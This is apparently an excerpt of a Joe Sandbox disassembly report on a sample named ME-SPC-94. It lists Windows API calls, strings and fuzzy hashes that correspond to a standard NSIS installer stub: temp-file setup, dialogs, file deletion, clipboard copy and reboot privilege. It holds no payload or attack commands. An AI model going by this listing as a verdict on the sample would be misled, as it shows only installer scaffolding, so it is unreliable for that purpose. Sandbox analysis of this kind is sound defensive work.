                                                  • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                  • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                  • DeleteObject.GDI32(00000000), ref: 00404C64
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                  • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                  • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004050EF
                                                  • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                  • ShowWindow.USER32(00000000), ref: 0040514F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                  • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                  • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                  • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                  APIs
                                                  • #17.COMCTL32 ref: 00403379
                                                  • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                  • OleInitialize.OLE32(00000000), ref: 0040338B
                                                    • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                    • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                    • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                    • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                  • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                  • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                  • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                  • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                  • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                  • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                  • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                  • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                  • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                  • OleUninitialize.OLE32(?), ref: 0040366C
                                                  • ExitProcess.KERNEL32 ref: 0040368C
                                                  • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                  • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                  • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                  • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                  • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                  • CopyFileW.KERNEL32(00437800,0041FEA8,?), ref: 00403725
                                                  • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                  • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                  • ExitProcess.KERNEL32 ref: 00403827
                                                  Strings
                                                  Similarity
                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                  • API String ID: 4107622049-1875889550
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,00436800,771B2EE0,00434000), ref: 004057F9
                                                  • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,771B2EE0,00434000), ref: 00405841
                                                  • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 00405864
                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 0040586A
                                                  • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 0040587A
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                  • FindClose.KERNEL32(00000000), ref: 00405929
                                                  Strings
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: \*.*
                                                  • API String ID: 2035342205-1173974218
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,771B2EE0,004057F0,?,00436800,771B2EE0), ref: 00406296
                                                  • FindClose.KERNEL32(00000000), ref: 004062A2
                                                  Strings
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: 8WB
                                                  • API String ID: 2295610775-3088156181
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                  • GetClientRect.USER32(?,?), ref: 004053DC
                                                  • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405480
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                    • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                  • ShowWindow.USER32(00000000), ref: 0040552C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405531
                                                  • ShowWindow.USER32(00000008), ref: 0040557B
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                  • CreatePopupMenu.USER32 ref: 004055C0
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                  • GetWindowRect.USER32(?,?), ref: 004055F4
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                  • OpenClipboard.USER32(00000000), ref: 00405655
                                                  • EmptyClipboard.USER32 ref: 0040565B
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                  • CloseClipboard.USER32 ref: 004056B6
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {$&B
                                                  • API String ID: 590372296-2518801558
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                  • ShowWindow.USER32(?), ref: 00403D1B
                                                  • DestroyWindow.USER32 ref: 00403D2F
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                  • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                  • GetDlgItem.USER32(?,?), ref: 00403E35
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EAA
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                  • EnableWindow.USER32(?,?), ref: 00403F83
                                                  • EnableWindow.USER32(?,?), ref: 00403F9E
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FB4
                                                  • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403FD3
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                  • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                  • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                  Strings
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID: &B
                                                  • API String ID: 184305955-3208460036
                                                  APIs
                                                    • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                    • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                    • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,771B3420,00000000,00434000), ref: 004039A0
                                                  • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                  • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                  • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403A87
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                  • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                  • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                  • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                  • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                  Strings
                                                  Similarity
                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                  • API String ID: 914957316-1918744475
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 004043D5
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404406
                                                  • GetSysColor.USER32(?), ref: 00404417
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                  • lstrlenW.KERNEL32(?), ref: 00404438
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                  • SendMessageW.USER32(00000000), ref: 004044BA
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                  • SetCursor.USER32(00000000), ref: 00404539
                                                  • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 0040454E
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                  • SetCursor.USER32(00000000), ref: 0040455D
                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 0040458C
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: N$open
                                                  • API String ID: 3615053054-904208323
                                                  APIs
                                                  • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,?,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405E0A,?,?,?,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                  • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                    • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                    • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                  • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                  • wsprintfA.USER32 ref: 00405CDE
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                    • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                    • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                  • API String ID: 1265525490-899692902
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                  • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                  • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                  • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                    • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 0040623F
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406253
                                                    • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406266
                                                  • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                  • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                  • String ID: A$&B
                                                  • API String ID: 2246997448-2586977930
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DD0
                                                  • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                    • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                    • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                  • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                  Strings
                                                  • Inst, xrefs: 00402EA3
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                  • Null, xrefs: 00402EB5
                                                  • Error launching installer, xrefs: 00402E0C
                                                  • soft, xrefs: 00402EAC
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-787788815
                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                  • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060AB
                                                  • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 004060BE
                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                  • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                  • CoTaskMemFree.OLE32(?), ref: 00406113
                                                  • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                  • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                  Strings
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-730719616
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                  • GetSysColor.USER32(00000000), ref: 0040423A
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                  • SetBkMode.GDI32(?,?), ref: 00404252
                                                  • GetSysColor.USER32(?), ref: 00404265
                                                  • SetBkColor.GDI32(?,?), ref: 00404275
                                                  • DeleteObject.GDI32(?), ref: 0040428F
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402616
                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402639
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264F
                                                    • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Memory Dump Source
